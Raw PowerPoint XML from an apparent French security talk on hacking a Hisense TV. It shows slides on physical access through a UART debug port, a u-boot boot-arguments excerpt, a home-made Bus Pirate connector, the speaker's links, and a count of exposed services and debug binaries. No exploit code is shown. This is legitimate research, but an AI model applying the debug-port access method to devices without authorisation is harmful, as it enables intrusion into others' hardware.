                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65322127-FD03-FF1B-1760-C64C229FB471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F03DE8CC-0F58-4667-D439-5E5D91C21C07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>UART</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAA5E00-0FF8-1919-2492-EEBC0C7697D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492301" y="2010506"/>
            <a:ext cx="8373335" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> MS_RFS root=/dev/mmcblk0p7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rootfstype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>squashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rootwait</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bootargs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cusdata_projectid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=700M quiet console=ttyS0,115200 $(MS_RFS) init=/init CORE_DUMP_PATH=/var/core_dump.%p.gz</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E23EB33A-5867-F0B2-659E-4263E9FA1828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3376796" y="1783219"/>
            <a:ext cx="4067944" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Extrait du script u-boot:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C460BAC-3523-6228-70A6-44045ECEF859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492301" y="2772148"/>
            <a:ext cx="2592288" cy="264255"/>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0337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767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé de la date 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titre 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>DIY </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E01A605-3346-1CBE-A406-134563F17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4" t="9051" r="10625" b="8001"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="452984" y="1311675"/>
            <a:ext cx="3248091" cy="2491255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B498BDEF-3A3A-75CB-1EDE-2274CA80AD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6" t="17451" r="15000" b="19550"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5525001" y="1202363"/>
            <a:ext cx="3248092" cy="3577516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="ZoneTexte 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABF737B-4826-7A41-7B65-EF6443845D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589073" y="3874321"/>
            <a:ext cx="2975912" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bus Pirate + Arduino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ProtoShield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> + Cable Jack = TV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Connector</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF6922D8-F892-F5FC-25C8-CBD592423DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3842122" y="1202363"/>
            <a:ext cx="1459756" cy="1661812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF016AA-95E3-3F7D-3F7D-39B579984427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181931" y="2614184"/>
            <a:ext cx="772703" cy="723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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC6B6A5-57FD-DF9D-4EAE-56511B4F955A}"/>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2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3B108F-1682-5D6D-7B99-4D36C71814E3}"/>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a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>UART</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307171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fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé de la date 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="2022-01-23 16-19-25">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886157C6-4BAD-AD57-13AE-8CFBE61D3E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39388584"/>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E074A-C175-9419-1F57-3B50A5A94C41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du contenu 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308B173D-5CC9-1AE6-F795-781173C906C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415343" y="1357706"/>
            <a:ext cx="8363531" cy="3482185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="http://www.tomtombinary.xyz"/>
              </a:rPr>
              <a:t>http://www.tomtombinary.xyz</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.root-me.org/Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://twitter.com/tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Aperi’Kube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C3CB0EA-46FB-2B38-A8B0-E9D76887C46A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5179C5-9F45-5088-397B-48D071F98662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3257CAE2-2E3C-85E0-D190-59F8C4436D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067" y="1515351"/>
            <a:ext cx="2112798" cy="2112798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A2A258-47DF-9751-D877-5A2D0A026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438" y="3637874"/>
            <a:ext cx="549883" cy="549883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphique 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA441B5-CC2C-42BE-7DB8-D4DF5BA1504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582" y="3637875"/>
            <a:ext cx="549882" cy="549882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{171C9389-F186-8F22-1421-91AD493D3F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631" y="3689891"/>
            <a:ext cx="504060" cy="414473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Image 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F92197-73C9-CC84-2BF8-FB4288DFCD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8676" y="3637874"/>
            <a:ext cx="549883" cy="549883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316625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10BC9148-C7E5-B7EA-2506-2E70DE277576}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421054" y="1345267"/>
            <a:ext cx="5255846" cy="2082687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>~40 services </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>~20 services réseau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Beaucoup de binaires de déploiement / test / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (gdb, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>test_remotapp_cli_api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, …)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2500" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hisenseUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
